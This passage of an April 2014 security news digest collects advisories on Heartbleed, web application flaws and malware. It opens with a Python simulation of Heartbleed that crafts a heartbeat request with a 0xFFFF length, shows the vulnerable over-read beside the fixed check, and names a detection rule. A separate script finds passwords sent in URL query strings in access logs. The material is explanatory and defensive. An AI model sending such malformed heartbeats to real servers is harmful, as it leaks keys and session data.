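    content_type, _major, _minor, length = struct.unpack("!BBBH", record[:5])
    return content_type, record[5:5 + length]


def handle_heartbeat_vulnerable(record: bytes, heap_after_record: bytes) -> bytes:
    """OpenSSL before 1.0.1g: copy payload_length bytes from the start of the
    payload into the response, trusting the field and ignoring the record's
    real length. With a short payload the copy runs past the padding into
    whatever sits next in memory, which the response then leaks."""
    _, body = split_record(record)
    _hb_type, payload_length = struct.unpack("!BH", body[:HEADER])
    heap = body + heap_after_record               # the request sits in front of other heap data
    return heap[HEADER:HEADER + payload_length]   # no comparison with len(body)


def handle_heartbeat_fixed(record: bytes):
    """OpenSSL 1.0.1g and later: silently drop the request unless the whole
    message (type, length field, payload and minimum padding) fits inside
    the record that was actually received. Returns the payload to echo back
    in a HeartbeatResponse, or None when the request is discarded."""
    content_type, body = split_record(record)
    if content_type != TLS_HEARTBEAT or len(body) < HEADER + MIN_PADDING:
        return None
    hb_type, payload_length = struct.unpack("!BH", body[:HEADER])
    if hb_type != HEARTBEAT_REQUEST or HEADER + payload_length + MIN_PADDING > len(body):
        return None
    return body[HEADER:HEADER + payload_length]


if __name__ == "__main__":
    secret_memory = b"session=abc123; key=-----BEGIN RSA PRIVATE KEY-----"   # constructed
    benign = build_heartbeat_request(b"ping", len(b"ping"))
    malicious = build_heartbeat_request(b"x", 0xFFFF)
    print("benign, fixed   :", handle_heartbeat_fixed(benign))
    print("malicious, fixed:", handle_heartbeat_fixed(malicious))
    print("malicious, vuln :", handle_heartbeat_vulnerable(malicious, secret_memory)[:60])
    print("blocked by rule :", is_heartbeat_record(malicious))
```

A fixed-offset record-type filter only sees a heartbeat record that starts where the rule expects it in the TCP segment; a heartbeat split across segments or preceded by another record in the same segment slips through. Such rules are a stopgap for hosts that cannot be patched yet, not a substitute for upgrading OpenSSL and rotating keys and certificates.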
*** Heartbleed vendor notifications, (Wed, Apr 9th) ***
---------------------------------------------
As people are running around having an entertaining day, we thought it might be a good idea to keep track of the various vendor notifications. I'd like to start a list here and, either via comments or by sending it in, let us know of vendor notifications relating to this issue. Please provide comments to the original article relating to the vulnerability itself, and use this post only to provide links to vendor notifications rather than articles etc. about the issue.
---------------------------------------------
http://isc.sans.edu/diary.html?storyid=17929&rss
*** Bugtraq: SQL Injection in Orbit Open Ad Server ***
---------------------------------------------
High-Tech Bridge Security Research Lab discovered a vulnerability in Orbit Open Ad Server which can be exploited to perform SQL injection attacks, alter SQL requests to the database of the vulnerable application and potentially gain control over the vulnerable website.
---------------------------------------------
http://www.securityfocus.com/archive/1/531781
*** Office for Mac: update plugs critical hole ***
---------------------------------------------
With a new OS X version of Office 2011, Microsoft has eliminated the RTF vulnerability in Word. The update is also supposed to fix various problems in Outlook, Excel and Word.
---------------------------------------------
http://www.heise.de/security/meldung/Office-fuer-Mac-Update-stopft-kritisch…
*** Sophos Web Appliance Security Bypass Vulnerability ***
---------------------------------------------
A vulnerability has been reported in Sophos Web Appliance, which can be exploited by malicious people to bypass certain security restrictions.
The vulnerability is caused due to an unspecified error related to the "Change Password" dialog box and can be exploited to change the administrative password.
---------------------------------------------
https://secunia.com/advisories/57706
*** Security Notice-Statement on OpenSSL Heartbeat Extension Vulnerability ***
---------------------------------------------
Huawei has taken note of the information regarding the OpenSSL heartbeat extension vulnerability and immediately launched a thorough investigation.
The investigation is still ongoing. Huawei PSIRT will keep updating this security notice (SN) and will provide conclusions as soon as possible. Please stay tuned.
---------------------------------------------
http://www.huawei.com/en/security/psirt/security-bulletins/security-notices…
=======================
= End-of-Shift report =
=======================
Timeframe: Monday 07-04-2014 18:00 − Tuesday 08-04-2014 18:00
Handler: Robert Waldner
Co-Handler: n/a
*** The disaster for encryption on the web: horror bug in OpenSSL ***
---------------------------------------------
An extremely serious programming error apparently endangers the encryption, keys and data of connections secured with OpenSSL on the internet. Given how widespread the open-source library is, this is a fairly sizeable catastrophe.
---------------------------------------------
http://www.heise.de/security/meldung/Der-GAU-fuer-Verschluesselung-im-Web-H…
*** VU#568252: Websense Triton Unified Security Center 7.7.3 information disclosure vulnerability ***
---------------------------------------------
Vulnerability Note VU#568252: Websense Triton Unified Security Center 7.7.3 information disclosure vulnerability. Original release date: 07 Apr 2014 | Last revised: 07 Apr 2014
Overview: Websense Triton Unified Security Center 7.7.3 and possibly earlier versions contain an information disclosure vulnerability which could allow an authenticated attacker to view stored credentials of a possibly higher-privileged user.
Description: CWE-200: Information Exposure. When logged into the Websense Triton
---------------------------------------------
http://www.kb.cert.org/vuls/id/568252
*** Energy utility tests its security - and fails ***
---------------------------------------------
In "Live Free or Die Hard" (Stirb langsam 4.0), cyber crooks shut down the entire power supply in the eastern USA over the internet. An unrealistic scenario? Not entirely ...
---------------------------------------------
http://www.heise.de/newsticker/meldung/Energieversorger-testet-Sicherheit-u…
*** The Muddy Waters of XP End-of-Life and Public Disclosures ***
---------------------------------------------
Security researchers who have privately disclosed Windows XP vulnerabilities to Microsoft may never see patches for their bugs with XP's end-of-life date at hand. Will there be a rash of public disclosures?
---------------------------------------------
http://threatpost.com/the-muddy-waters-of-xp-end-of-life-and-public-disclos…
*** Data of more than 500 million users stolen in 2013 ***
---------------------------------------------
According to calculations by IT security experts, data of more than half a billion internet users was stolen in online attacks last year.
---------------------------------------------
http://futurezone.at/digital-life/2013-wurden-daten-von-ueber-500-millionen…
*** Background: c't Fritzbox test detects hidden devices ***
---------------------------------------------
Some users of the Fritzbox test get unexpected results. Often WLAN APs, repeaters or other AVM devices are the cause. There are also a few sources of error that may make a manual test necessary.
---------------------------------------------
http://www.heise.de/newsticker/meldung/Hintergrund-c-t-Fritzbox-Test-spuert…
*** The 2013 Internet Security Threat Report: Year of the Mega Data Breach ***
---------------------------------------------
Once again, it’s time to reveal the latest findings from our Internet Security Threat Report (ISTR), which looks at the current state of the threat landscape, based on our research and analysis from the past year. Key trends from this year’s report include the large increase in data breaches and targeted attacks, the evolution of mobile malware and ransomware, and the potential threat posed by the Internet of Things.
---------------------------------------------
http://www.symantec.com/connect/blogs/2013-internet-security-threat-report-…
*** Cacti Multiple Vulnerabilities ***
---------------------------------------------
Some vulnerabilities have been reported in Cacti, which can be exploited by malicious users to conduct script insertion and SQL injection attacks and compromise a vulnerable system.
* CVE-2014-2326
* CVE-2014-2708
* CVE-2014-2709
---------------------------------------------
https://secunia.com/advisories/57647
*** Open-Xchange Email Autoconfiguration Information Disclosure Weakness ***
---------------------------------------------
A weakness has been reported in Open-Xchange, which can be exploited by malicious people to disclose certain sensitive information.
The weakness is caused due to the application communicating certain information via parameters of a GET request when using the email autoconfiguration, which can be exploited to disclose the account password.
---------------------------------------------
https://secunia.com/advisories/57654
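The Open-Xchange weakness above is the general problem of secrets in a query string: a GET parameter ends up in the server access log, in proxy logs, in browser history and in Referer headers, TLS or not. The check below is an added example, not Open-Xchange code. It scans Common Log Format access-log lines for GET requests carrying credential-looking parameters and shows how to redact such a request target before it is logged or forwarded. The log lines, the request path and the parameter names are constructed for the example; Open-Xchange's actual parameter names are not taken from the advisory.

```python
"""Find credentials passed as GET parameters in web server access logs.

Added example, not Open-Xchange code. The log lines, the /ajax/autoconfig
path and the parameter names below are constructed for illustration.
"""
import re
from urllib.parse import parse_qsl, urlencode, urlsplit

# Parameter names that should never appear in a query string (assumed list).
SENSITIVE_PARAMS = {"password", "passwd", "pwd", "pass", "secret", "token"}

# Common Log Format: ip ident user [timestamp] "METHOD target PROTO" status size
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log: two GET requests leak a password in the URL.
SAMPLE_LOG = """\
203.0.113.5 - - [07/Apr/2014:10:12:01 +0200] "GET /ajax/autoconfig?action=get&email=alice%40example.org&password=hunter2 HTTP/1.1" 200 512
203.0.113.5 - - [07/Apr/2014:10:12:03 +0200] "POST /ajax/login HTTP/1.1" 200 120
198.51.100.7 - - [07/Apr/2014:10:13:44 +0200] "GET /ajax/mail?action=all&folder=default0/INBOX HTTP/1.1" 200 8192
198.51.100.7 - - [07/Apr/2014:10:14:02 +0200] "GET /ajax/autoconfig?email=bob%40example.org&pwd=s3cret HTTP/1.1" 200 512
"""


def sensitive_params(target: str) -> list:
    """Return the sorted sensitive parameter names present in a request target."""
    query = urlsplit(target).query
    names = {k for k, _ in parse_qsl(query, keep_blank_values=True)
             if k.lower() in SENSITIVE_PARAMS}
    return sorted(names)


def find_credentials_in_log(log_text: str) -> list:
    """Scan access-log text; return (client_ip, path, [param names]) per hit.

    Only GET is inspected: a POST body is not written to the access log,
    which is exactly why credentials belong in a POST body (or an
    Authorization header) rather than in the URL.
    """
    findings = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m or m.group("method") != "GET":
            continue
        names = sensitive_params(m.group("target"))
        if names:
            findings.append((m.group("ip"), urlsplit(m.group("target")).path, names))
    return findings


def redact_target(target: str) -> str:
    """Rewrite a request target with sensitive parameter values replaced,
    for log pipelines or proxies that must record the URL anyway."""
    parts = urlsplit(target)
    if not parts.query:
        return target
    pairs = [(k, "REDACTED" if k.lower() in SENSITIVE_PARAMS else v)
             for k, v in parse_qsl(parts.query, keep_blank_values=True)]
    return parts.path + "?" + urlencode(pairs)


if __name__ == "__main__":
    for ip, path, names in find_credentials_in_log(SAMPLE_LOG):
        print(f"{ip} sent {', '.join(names)} in the query string of {path}")
```

Run it against a real access log by reading the file into find_credentials_in_log. A hit means the secret has already been written to disk, so beyond fixing the client, treat the affected accounts' passwords as exposed and scrub or rotate the logs.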
*** VU#345337: J2k-Codec contains multiple exploitable vulnerabilities ***
---------------------------------------------
Vulnerability Note VU#345337: J2k-Codec contains multiple exploitable vulnerabilities. Original release date: 08 Apr 2014 | Last revised: 08 Apr 2014
Overview: J2k-Codec contains multiple exploitable vulnerabilities, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system.
Description: J2k-Codec is a JPEG 2000 decoding library for Windows. It contains multiple exploitable vulnerabilities that can lead to arbitrary code execution.
---------------------------------------------
http://www.kb.cert.org/vuls/id/345337
=======================
= End-of-Shift report =
=======================
Timeframe: Friday 04-04-2014 18:00 − Monday 07-04-2014 18:00
Handler: Robert Waldner
Co-Handler: n/a
*** BSI website to check whether your own email address is affected in the current case ***
---------------------------------------------
In the course of an ongoing investigation by the Verden (Aller) public prosecutor's office, another case of large-scale identity theft has been uncovered.
...
This website lets you check whether you are affected by the identity theft.
---------------------------------------------
https://www.sicherheitstest.bsi.de/
*** VirusShield: just a logo - nothing else ***
---------------------------------------------
The Android app VirusShield reached enormous sales figures within a very short time. However, the app does nothing at all.
---------------------------------------------
http://www.golem.de/news/virusshield-nur-ein-logo-sonst-nichts-1404-105677-…
*** Hash function: draft SHA-3 standard available ***
---------------------------------------------
The US agency NIST has presented a draft for standardizing the SHA-3 hash function. It is now open for comment for three months.
---------------------------------------------
http://www.golem.de/news/hash-funktion-entwurf-fuer-sha-3-standard-liegt-vo…
*** Those strange e-mails with URLs in them can lead to Android malware, (Sat, Apr 5th) ***
---------------------------------------------
You've probably gotten a few of these e-mails over the last few months (I saw the first one of this latest kind in early Feb); we got one to the handlers list earlier this week, which prompted this diary. They seem pretty innocuous: they have little or no text and a URL like the one shown below. Note: the above link doesn't lead to the malware anymore, so I didn't obscure it. Most seem to be sent from Yahoo! (or Yahoo!-related e-mail addresses), so they may be coming from addresses that were
---------------------------------------------
http://isc.sans.edu/diary.html?storyid=17909&rss
*** XMPP-Layer Compression Uncontrolled Resource Consumption ***
---------------------------------------------
Topic: XMPP-Layer Compression Uncontrolled Resource Consumption. Risk: Medium. Original release date: 2014-04-04, last updated: 2014-04-04 ...
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014040034
*** Fake Voting Campaign Steals Facebook Users’ Identities ***
---------------------------------------------
Contributor: Parag Sawant. Phishers continuously come up with various plans to enhance their chances of harvesting users' sensitive information. Symantec recently observed a phishing campaign where data is collected through a fake voting site which asks users to decide whether boys or girls are greater.
---------------------------------------------
http://www.symantec.com/connect/blogs/fake-voting-campaign-steals-facebook-…
*** Advice for Enterprises in 2014: Protect Your Core Data ***
---------------------------------------------
Some companies may think – “if it can happen to a spy agency, there’s nothing we could do. We should just give up and not protect our data anymore.” Others may say: “let’s build a bigger wall around our data.” Both approaches are incorrect. Obviously, you have to protect your data. However, neither can enterprises just try and protect everything with the same rigor. ... What an enterprise needs to focus on is what really needs to be protected.
---------------------------------------------
http://blog.trendmicro.com/trendlabs-security-intelligence/advice-for-enter…
*** Microsoft spells out new rules for exiling .EXEs ***
---------------------------------------------
Microsoft has updated the methodology it uses to define adware, a move designed to make it clearer just what the company considers worthy of removal by its malware tools. ... The kinds of "unwanted behaviours" that Redmond is looking for will be familiar to anyone who's been burned by mistakenly clicking on a link, with lack of user choice or control topping the list.
---------------------------------------------
http://www.theregister.co.uk/2014/04/07/microsoft_puts_adware_in_the_crossh…
*** Netgear closes backdoor in DGN1000 modem router ***
---------------------------------------------
The company has released a firmware update that is meant to close the backdoor on port 32764 of the DSL modem router. Through the hole, attackers can read out the devices' passwords.
---------------------------------------------
http://www.heise.de/security/meldung/Netgear-schliesst-Hintertuer-in-Modemr…
*** RSA Data Loss Prevention Security Bypass Security Issue ***
---------------------------------------------
A security issue has been reported in RSA Data Loss Prevention, which can be exploited by malicious users to bypass certain security restrictions.
The security issue is caused by an error within the session management and can be exploited to access otherwise restricted content.
---------------------------------------------
https://secunia.com/advisories/57464
=======================
= End-of-Shift report =
=======================
Timeframe: Thursday 03-04-2014 18:00 − Friday 04-04-2014 18:00
Handler: Robert Waldner
Co-Handler: n/a
*** SMBEXEC Rapid Post Exploitation Tool ***
---------------------------------------------
Smbexec is a tool for penetration testing against domain controllers: it runs post-exploitation actions with domain accounts and expands access across the targeted network, giving the pentester full access without a separate privilege escalation step.
---------------------------------------------
http://www.sectechno.com/2014/03/30/smbexec-rapid-post-exploitation-tool/
*** IBM Security Bulletin: Fixes available for Cross Site Scripting vulnerabilities in IBM WebSphere Portal (CVE-2014-0828 and CVE-2014-0901) ***
---------------------------------------------
Fixes are available for Cross Site Scripting vulnerabilities in IBM WebSphere Portal.
CVE(s): CVE-2014-0828 and CVE-2014-0901
---------------------------------------------
https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin…
*** IBM Security Bulletin: WebSphere Partner Gateway Advanced/Enterprise is affected by vulnerabilities that exist in the IBM SDK for Java (CVE-2014-0411) ***
---------------------------------------------
WebSphere Partner Gateway Advanced/Enterprise uses the IBM SDK for Java, which is based on the Oracle JDK. Oracle has released the January 2014 Critical Patch Update (CPU), which contains security vulnerability fixes. The IBM SDK for Java has been updated to incorporate these fixes. CVE(s): CVE-2014-0411
---------------------------------------------
https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin…
*** OTRS Help Desk clickjacking ***
---------------------------------------------
OTRS Help Desk could allow a remote attacker to hijack the clicking action of the victim. By persuading a victim to visit a malicious Web site, a remote attacker could send a specially-crafted HTTP request to hijack the victim's click actions or launch other client-side browser attacks.
---------------------------------------------
http://xforce.iss.net/xforce/xfdb/92233
*** iOS 7.1 bug enables iCloud account deletion, disabling Find My iPhone, without password ***
---------------------------------------------
A bug demonstrated by a YouTube user on Wednesday may enable a thief to delete an iCloud account, disable Find My iPhone, and ultimately restore the device, without the need of a password.
---------------------------------------------
http://feedproxy.google.com/~r/SCMagazineHome/~3/kToL7uqo4FE/
*** Your files held hostage by CryptoDefense? Don't pay up! The decryption key is on your hard drive ***
---------------------------------------------
Blunder discovered in latest ransomware infecting PCs. A basic rookie programming error has crippled an otherwise advanced piece of ransomware dubbed CryptoDefense – but the crap coders are still pulling in more than $30,000 a month from unwary punters.…
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2014/04/03/cryptodefen…
*** Advance Notification Service for the April 2014 Security Bulletin Release ***
---------------------------------------------
Today we provide advance notification for the release of four bulletins, two rated Critical and two rated Important in severity. These updates address issues in Microsoft Windows, Office and Internet Explorer. The update provided through MS14-017 fully addresses the Microsoft Word issue first described in Security Advisory 2953095. This advisory also included a Fix it to disable opening rich-text format (RTF) files within Microsoft Word. Once the security update is applied, you should disable
---------------------------------------------
http://blogs.technet.com/b/msrc/archive/2014/04/03/advance-notification-ser…
*** Schneider Electric OPC Factory Server Buffer Overflow ***
---------------------------------------------
OVERVIEW Researcher Wei Gao, formerly of IXIA, has identified a buffer overflow vulnerability in the Schneider Electric OPC Factory Server (OFS) application. Schneider Electric has produced a patch that mitigates this vulnerability. Wei Gao has tested the patch to validate that it resolves the vulnerability.This vulnerability could be exploited remotely.
---------------------------------------------
http://ics-cert.us-cert.gov/advisories/ICSA-14-093-01
*** Adware: A new approach ***
---------------------------------------------
Here at the Microsoft Malware Protection Center (MMPC) we understand advertising is part of the modern computing experience. However, we want to give our customers choice and control regarding what happens with their computers. To that end we have recently undergone some changes to both the criteria we use to classify a program as adware and how we remediate it when we find it. This blog will help explain the new criteria and how it affects some programs. Our updated objective criteria
---------------------------------------------
http://blogs.technet.com/b/mmpc/archive/2014/04/03/adware-a-new-approach.as…
*** Zeus malware found with valid digital certificate ***
---------------------------------------------
A recently discovered variant of the Zeus banking Trojan was found to use a legitimate digital signature to avoid detection by web browsers and anti-virus systems. Security vendor Comodo reported Thursday finding the variant 200 times while monitoring and analyzing data from users of its Internet security system. The variant includes the digital signature, a rootkit and a data-stealing malware component. "Malware with a valid digital signature is an extremely dangerous situation," the
---------------------------------------------
http://www.csoonline.com/article/2140021/data-protection/zeus-malware-found…
*** Linux-PAM "pam_timestamp" Module Two Directory Traversal Vulnerabilities ***
---------------------------------------------
Two vulnerabilities have been reported in Linux-PAM, which can be exploited by malicious people to bypass certain security restrictions.
---------------------------------------------
https://secunia.com/advisories/57317
*** Email accounts hacked: BSI wants to inform millions of affected users ***
---------------------------------------------
Authorities and providers want to inform users about the hack of email accounts. How and when the campaign is to start has not yet been decided.
---------------------------------------------
http://www.golem.de/news/e-mail-konten-gehackt-bsi-will-millionen-betroffen…
*** TLS libraries: finding bugs with malformed certificates ***
---------------------------------------------
Using malformed X.509 certificates, researchers have found numerous bugs, some of them security-critical, in TLS libraries. Once again, a serious vulnerability was discovered in GnuTLS.
---------------------------------------------
http://www.golem.de/news/tls-bibliotheken-fehler-finden-mit-fehlerhaften-ze…
*** Cisco Emergency Responder - Multiple vulnerabilities ***
---------------------------------------------
Cross-Site Scripting - http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014…
Cross-Site Request Forgery - http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014…
Open Redirect - http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014…
Dynamic Content Modification - http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014…
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014…
*** PHP 5.4.27 released, (Fri, Apr 4th) ***
---------------------------------------------
A new version of PHP has been released. The announcement comments: "The PHP development team announces the immediate availability of PHP 5.4.27. 6 bugs were fixed in this release, including CVE-2013-7345 in fileinfo module."
---------------------------------------------
http://isc.sans.edu/diary.html?storyid=17901&rss
*** April 8th: Not Just About XP ***
---------------------------------------------
April 8th will soon be upon us! And that means…Countdown Clocks…the end of extended support for Windows XP. But not just XP. Office 2003 is also reaching its end of life. And that's especially important to know because there's currently an Office vulnerability in the wild. Microsoft released its Security Bulletin Advance Notification yesterday. And the good news is: a patch for the Word vulnerability appears to be in the pipeline.
---------------------------------------------
http://www.f-secure.com/weblog/archives/00002690.html
*** Dealing with Disaster - A Short Malware Incident Response, (Fri, Apr 4th) ***
---------------------------------------------
I had a client call me recently with a full-on service outage - his servers weren't reachable, his VOIP phones were giving him more static than voice, and his Exchange server wasn't sending or receiving mail - pretty much everything was offline. I VPN'd in (I was not onsite) and started with the firewall, because things were bad enough that's all I could initially get to from a VPN session.
---------------------------------------------
http://isc.sans.edu/diary.html?storyid=17905&rss
*** Cisco IOS XR Software ICMPv6 Redirect Vulnerability ***
---------------------------------------------
A vulnerability in Internet Control Message Protocol version 6 (ICMPv6) processing of Cisco IOS XR Software could allow an unauthenticated, adjacent attacker to affect IPv4 and IPv6 traffic passing through an affected device.
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014…
*** Researchers Uncover Interesting Browser-Based Botnet ***
---------------------------------------------
Security researchers discovered an odd DDoS attack against several sites recently that relied on a persistent cross-site scripting vulnerability in a major video Web site and hijacked users’ browsers in order to flood the site with traffic. The attack on the unnamed site involved the use of injected Javascript on the site which would execute in […]
---------------------------------------------
http://threatpost.com/researchers-uncover-interesting-browser-based-botnet/…
=======================
= End-of-Shift report =
=======================
Timeframe: Mittwoch 02-04-2014 18:00 − Donnerstag 03-04-2014 18:00
Handler: Robert Waldner
Co-Handler: n/a
*** Researchers Divulge 30 Oracle Java Cloud Service Bugs ***
---------------------------------------------
Upset with the vulnerability handling process at Oracle, researchers yesterday disclosed over two dozen issues with the company’s Java Cloud Service platform.
---------------------------------------------
http://threatpost.com/researchers-divulge-30-oracle-java-cloud-service-bugs…
*** Ad Violations: Why Search Engines Won’t Display Your Site If it’s Infected With Malware ***
---------------------------------------------
As your site's webmaster, have you ever seen an e-mail from Google like this: Hello, We wanted to alert you that one of your sites violates our advertising policies. Therefore, we won't be able to run any of your ads that link to that site, and any new ads pointing to that site will also
---------------------------------------------
http://feedproxy.google.com/~r/sucuri/blog/~3/kz7JGX2ydIU/ad-violations-why…
*** IBM Lotus Web Content Management cross-site scripting ***
---------------------------------------------
IBM Lotus Web Content Management is vulnerable to cross-site scripting, caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials.
---------------------------------------------
http://xforce.iss.net/xforce/xfdb/90566
*** Watching the watchers, (Thu, Apr 3rd) ***
---------------------------------------------
A lot of companies today have various IDS and IPS devices implemented in their internal network (especially if you must be compliant with PCI DSS, for example). So these devices get implemented to monitor various traffic at various interfaces/perimeters in a company, but the question I got asked is how can we be sure that the IDS/IPS is doing its job? Obviously, some simple monitoring should be in place – this typically consists of pinging the device or collecting various counters such
---------------------------------------------
http://isc.sans.edu/diary.html?storyid=17895&rss
*** Macro-Enabled Files Used as Infection Vectors (Again) ***
---------------------------------------------
Macro-based attacks were popular in the early 2000s, but they gained much notoriety with the much publicized coverage of the Melissa virus. However, macro-based attacks soon began to drop off the radar. One major reason for this would be the security measures implemented by Microsoft to address malicious macro files. Another probable reason would also […]
---------------------------------------------
http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/1X49GtDdVuU/
*** New Check_MK stable release 1.2.4p1 ***
---------------------------------------------
The most important changes are security patches for two CVEs (CVE-2014-2330 and CVE-2014-2331) which were published on 2014-03-24 and 2014-03-28 on the bugtraq mailing list. The mail from 2014-03-24 contained wrong information on the not-fixed issues, which was corrected with the mail from 2014-03-28. All of the reported security-related issues are fixed with this release.
---------------------------------------------
http://lists.mathias-kettner.de/pipermail/checkmk-announce/2014-April/00008…
*** A Series of Introductory Malware Analysis Webcasts ***
---------------------------------------------
If you are looking to get started with malware analysis, tune into the webcast series I created to illustrate key tools and techniques for examining malicious software.
---------------------------------------------
http://blog.zeltser.com/post/80874760857/introductory-malware-analysis-webc…
*** Twelve sources of global cyber attack maps ***
---------------------------------------------
1 - Cyber Warfare Real Time Map by Kaspersky
2 - Top Daily DDoS Attacks Worldwide by Google
3 - Security Tachometer by Deutsche Telekom
4 - Cyberfeed Live Botnet Map by AnubisNetworks
5 - Real-time Web Monitor by Akamai
6 - IpViking Live Map by Norse
7 - Honeypots from the Honeynet Project
8 - Global Activity Maps by Arbor
9 - Global Botnet Threat Activity Map by Trend Micro
10 - DDoS Attacks by ShadowServer
11 - Internet Malicious Activity Maps by TeamCymru
12 - Globe and WorldMap by F-Secure
---------------------------------------------
http://sseguranca.blogspot.com.br/2014/03/ten-sources-of-global-cyber-attac…
*** SNMPCheck - Enumerate the SNMP devices ***
---------------------------------------------
Like snmpwalk, snmpcheck allows you to enumerate SNMP devices and places the output in a very human-readable format. It could be useful for penetration testing or systems monitoring.
---------------------------------------------
http://hack-tools.blackploit.com/2014/04/snmpcheck-enumerate-snmp-devices.h…
*** The Right Stuff: Staffing Your Corporate SOC ***
---------------------------------------------
In my experience, passing a certification exam or getting a degree simply shows that a potential employee is a good test-taker or has the determination to plow through a degree program. Neither substitutes for the wealth of experience SOC analysts need to be good at their jobs.
Don’t get me wrong. Certification programs can be an important piece of a cyber-security practitioner’s complete education.
---------------------------------------------
http://www.darkreading.com/operations/careers-and-people/the-right-stuff-st…
*** FortiBalancer SSH Access Security Bypass Vulnerability ***
---------------------------------------------
A vulnerability has been reported in FortiBalancer, which can be exploited by malicious people to bypass certain security restrictions.
The vulnerability is caused due to a configuration error related to SSH access and can be exploited to gain otherwise restricted SSH access.
The vulnerability is reported in FortiBalancer 400, 1000, 2000, and 3000.
---------------------------------------------
https://secunia.com/advisories/57673
*** Security: investigators discover data set with 18 million mail accounts ***
---------------------------------------------
Once again, a file containing millions of hacked mail accounts has been seized. All major German e-mail providers and several international providers are said to be affected.
---------------------------------------------
http://www.golem.de/news/sicherheit-fahnder-entdecken-datensatz-mit-18-mill…
*** Tool Estimates Incident Response Cost for Businesses ***
---------------------------------------------
A new tool called CyberTab will help businesses estimate the cost of real and potential cyberattacks, and the amount a company could possibly save by investing in preventative measures and technologies.
---------------------------------------------
http://threatpost.com/tool-estimates-incident-response-cost-for-businesses/…
*** Bugtraq: [softScheck] Denial of Service in Microsoft Office 2007-2013 ***
---------------------------------------------
softScheck has identified a Denial of Service vulnerability in Microsoft Outlook 2007-2013. A remote attacker can send a plaintext email containing an XML bomb as the message body, causing Outlook to freeze while opening the email. This forces the user to terminate the Outlook process.
In the default Outlook configuration, in which email contents are displayed in a reading pane in the main window, the impact is more severe: Outlook will freeze while starting and will not be able to start anymore, since it tries to open and display the email during startup.
To resolve the issue, Outlook needs to be started in safe mode and the email needs to be deleted.
---------------------------------------------
http://www.securityfocus.com/archive/1/531722
*** DFRWS EU 2014 Annual Conference ***
---------------------------------------------
DFRWS has a long history of being the foremost digital forensics research venue and has decided to hold a sister conference to bring the same opportunities to Europe. The first annual DFRWS EU conference will be held from May 7 to 9, 2014 in Amsterdam, NL.
---------------------------------------------
http://www.dfrws.org/2014eu/
*** Cisco IOS Software IKE Main Mode Vulnerability ***
---------------------------------------------
A vulnerability in the Internet Key Exchange (IKE) module of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to delete established security associations on an affected device.
The vulnerability is due to improper handling of rogue IKE Main Mode packets. An attacker could exploit this vulnerability by sending a crafted IKE Main Mode packet to an affected device. An exploit could allow the attacker to cause valid, established IKE security associations on an affected device to drop.
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014…
=======================
= End-of-Shift report =
=======================
Timeframe: Dienstag 01-04-2014 18:00 − Mittwoch 02-04-2014 18:00
Handler: Robert Waldner
Co-Handler: n/a
*** Whitehat Security's Aviator browser is coming to Windows ***
---------------------------------------------
I have had the privilege of knowing Jeremiah Grossman, the iCEO of Whitehat Security, for many years now. He has spoken on many occasions about web security and specifically web browser security or rather, the lack thereof. I recall at one point asking him, "OK, what do you use as a web browser?" He paused, smiled and said, "My own". That Cheshire cat response played over again in my head when Whitehat Security released their browser offering called Aviator. This is a
---------------------------------------------
http://www.csoonline.com/article/2136258/application-security/whitehat-secu…
*** 110,000 Wordpress Databases Exposed ***
---------------------------------------------
For years now I've been writing my various blog posts and I have used many different kinds of CMS platforms right back to posting using VI back in the 90s. My favourite platform that I've used to create content has been Wordpress by far. I can almost hear the security folks cringe. Yes, it is a massive headache to lock down. But, I fight on as the user experience makes the pain worthwhile. OK, maybe worthwhile isn't the correct word. This is a platform that has had a long history of security
---------------------------------------------
http://www.csoonline.com/article/2136246/application-security/110-000-wordp…
*** "ct wissen Windows": how to master the end of support for Windows XP ***
---------------------------------------------
Just in time for the end of Windows XP support, we are publishing "ct wissen Windows", a handbook for everyone affected. It not only explains exactly what the end of support means, but above all provides practical instructions.
---------------------------------------------
http://www.heise.de/newsticker/meldung/c-t-wissen-Windows-So-meistern-Sie-d…
*** Call for packets udp/137 broadcast, (Tue, Apr 1st) ***
---------------------------------------------
One of our readers has reported that he has seen broadcast traffic to udp/137. He suspected that the traffic caused a denial of service to some of his systems. If you have seen such traffic and would like to share some packets, we would appreciate that.
---------------------------------------------
http://isc.sans.edu/diary.html?storyid=17887&rss
*** AlienVault Open Source SIM date_from SQL injection ***
---------------------------------------------
AlienVault Open Source SIM (OSSIM) is vulnerable to SQL injection. A remote authenticated attacker could send specially-crafted SQL statements to the ISO27001Bar1.php script using the date_from parameter, which could allow the attacker to view, add, modify or delete information in the back-end database.
---------------------------------------------
http://xforce.iss.net/xforce/xfdb/92172
*** Password bug let me see shoppers credit cards in eBay ProStores, claims infosec bod ***
---------------------------------------------
Online bazaar fixes store account hijack flaw, we're told. A serious vulnerability that potentially allowed shoplifters to empty eBay ProStores shops and swipe customer credit cards has been fixed, according to the security researcher who says he found the hole.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2014/04/01/ebay_stores…
*** Fake Google apps removed from Windows Phone Store by Microsoft ***
---------------------------------------------
Five phony Google apps appeared in the app store, each with a $1.99 price tag, before being removed by the company.
---------------------------------------------
http://feedproxy.google.com/~r/SCMagazineHome/~3/fXb73Il-oZg/
*** Hack of Boxee.tv exposes password data, messages for 158,000 users ***
---------------------------------------------
